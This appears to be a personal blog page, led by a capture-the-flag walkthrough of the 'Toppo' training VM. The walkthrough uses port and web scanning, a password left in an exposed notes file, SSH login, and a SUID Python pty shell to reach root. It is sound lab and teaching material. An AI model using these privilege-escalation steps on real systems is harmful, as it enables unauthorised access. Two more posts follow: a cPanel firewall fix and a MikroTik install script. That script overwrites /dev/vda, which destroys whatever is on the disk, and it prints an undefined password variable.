Friday, September 18, 2020

CTF Machine - Toppo

 ﷽

Machine : Toppo
Duration :  15-20 Minutes (approximately)

Meet Toppo ...

1. Preparation :

Check my own IP.
ifconfig


Discover neighbours IP.
nmap -sn 192.168.56.0/24


2. Enumeration :

nmap -sC -A -p- 192.168.56.105



Found several open ports 22, 80, 111 & 58733. Lets try to browse the web server service (tcp/80) :

Also try to view the source code, looking for some interresting information, but no luck.


Meanwhile ... also look for any possible exploits for the identified services :

OpenSSH 6.7P1 (tcp/22) :

Apache httpd 2.4.10 (tcp/80) :


Examine web server : nikto -host http://192.168.56.105
and found admin directory and then mail.


Accessing admin directory which is in listing mode :

Inside admin directory, we found text file notes.txt, which might content user and password information.
Possible user and password information :
User : ted
Password : 12345ted123

While inside mail directory, we found .php file which is only returning No arguments Provided!

Performing access using ssh service, and got low level shell access.


Identifying system : uname -a and cat /etc/issue.net


Searching for usable executable files which authorized for user ted.
find / -perm -u=s 2>/dev/null


Python is potential escalation vector, but first lets try using find.
find / -name sp8 -exec /bin/bash \; or find / -name sp8 -exec /bin/sh \;


Failed attempt using find, lets try using the well known python shell spawn.
we can use python oneliner like python -c 'import pty; pty.spawn("/bin/sh")' or running python script.
echo 'import pty; pty.spawn("/bin/sh")' > sp8.py
python sp8.py



And we got root, while the flag.txt is simply can be found at the /root directory.

Finish ...

Thank you and Greets Hadi Mene.

Thursday, May 28, 2020

LFD on Excessive resource usage [FIX]

You may experiencing this issue if you are working with CPanel WHM and using LFD(Login Failure Daemon) to monitor server logs which is related to login failure attempt and then provide action in the CSF (Config Server Firewall).

LFD service sends excessive resource usage alerts to email with the following common format :


Time:         Thu Dec 28 13:58:57 2019 +0700
Account:      sp8dovr
Resource:     RSS Memory Size
Exceeded:     258 > 256 (MB)
Executable:   /usr/local/cpanel/3rdparty/perl/524/bin/perl
Command Line: spamd child
PID:          4241 (Parent PID:26888)
Killed:       No 
 
We can quickly solve this issue with using the following action :
 
1. Login to your WHM.
2. Goto Server Configuration > Terminal.
3. Create backup csf.pignore : cp /etc/csf/csf.pignore /etc/csf/csf.pignore.original
4. Edit file csf.pignore : vi /etc/csf/csf.pignore
5. Take note Executable from email notification to /etc/csf/csf.pignore.
   for example in this case Executable is 
   /usr/local/cpanel/3rdparty/perl/524/bin/perl
6. Referring to Executable in Step 5 add this line to /etc/csf/csf.pignore.
   exe:/usr/local/cpanel/3rdparty/perl/.*/bin/perl 
   .* are regex to replacing 524 so that we don't need to make any configuration
   whenever perl version is changed.
7. Lastly Restart LFD (ConfigServer Security & Firewall > lfd Restart)


Note :
Others also report the following executables varian :
cmd:spamd child 
exe:/usr/local/cpanel/3rdparty/perl/.*/bin/spamd
exe:/opt/cpanel/ea-php*/root/usr/sbin/php-fpm
exe:/usr/bin/gpg-agent 
 


That's it ...

Saturday, February 22, 2020

Install Mikrotik CHR from Ubuntu

#!/bin/bash
#
# SP8-CHR-2-DO run on Ubuntu 16.04.6
# Replace password in RMDPWD
#
apt-get update ; apt install -y qemu-utils pv screen ; modprobe nbd ; mkdir /mtksrc ;
screen ;
wget https://download.mikrotik.com/routeros/6.46.4/chr-6.46.4.img.zip -O CHR_SRC.zip
gunzip -c CHR_SRC.zip > CHR.img
qemu-img convert CHR.img -O qcow2 CHRS.qcow2
# Resize to 10G, please check your existing.
qemu-img resize CHRS.qcow2 10737418240
echo "Exporting disk image"
qemu-nbd -c /dev/nbd0  CHRS.qcow2
sleep 5
partprobe /dev/nbd0 ; mount /dev/nbd0p1 /mtksrc
#
IPADDR=`ip addr show eth0 | grep global | cut -d' ' -f 6 | head -n 1`
GW=`ip route list | grep default | cut -d' ' -f 3`
RMDPWD="My-Password"
echo "/ip address add address=$IPADDR interface=[/interface ethernet find where name=ether1]
/ip route add gateway=$GW
/ip service disable telnet
/user set 0 name=root password=$RMDPWD
/ip dns set servers=1.1.1.1,8.8.8.8
/system package update install
 " > /mtksrc/rw/autorun.scr
umount /mtksrc
e2fsck -f -y /dev/nbd0p1 || true
resize2fs /dev/nbd0p1
sleep 1
echo "Image to GZip"
mount -t tmpfs tmpfs /mtksrc
pv /dev/nbd0 | gzip > /mtksrc/SP-CHR.gz
sleep 2
echo "Default password is : $PASSWORD"
echo "or try admin with no password"
sleep 1
echo u > /proc/sysrq-trigger
echo "Writing image, to target disk"
zcat /mtksrc/SP-CHR.gz | pv > /dev/vda
sleep 5
shutdown -r now
#Done

40 Hadist Seputar Keluarga Samawa (Bagian 3)

 ﷽ Ustadz Yusuf Abu Ubaidah As-Sidawi hafizahullohuta'ala Masjid Al-Aziz  Jl. Soekarno Hatta No. 662 Bandung Hadist 11 : Doa Orangtua Bu...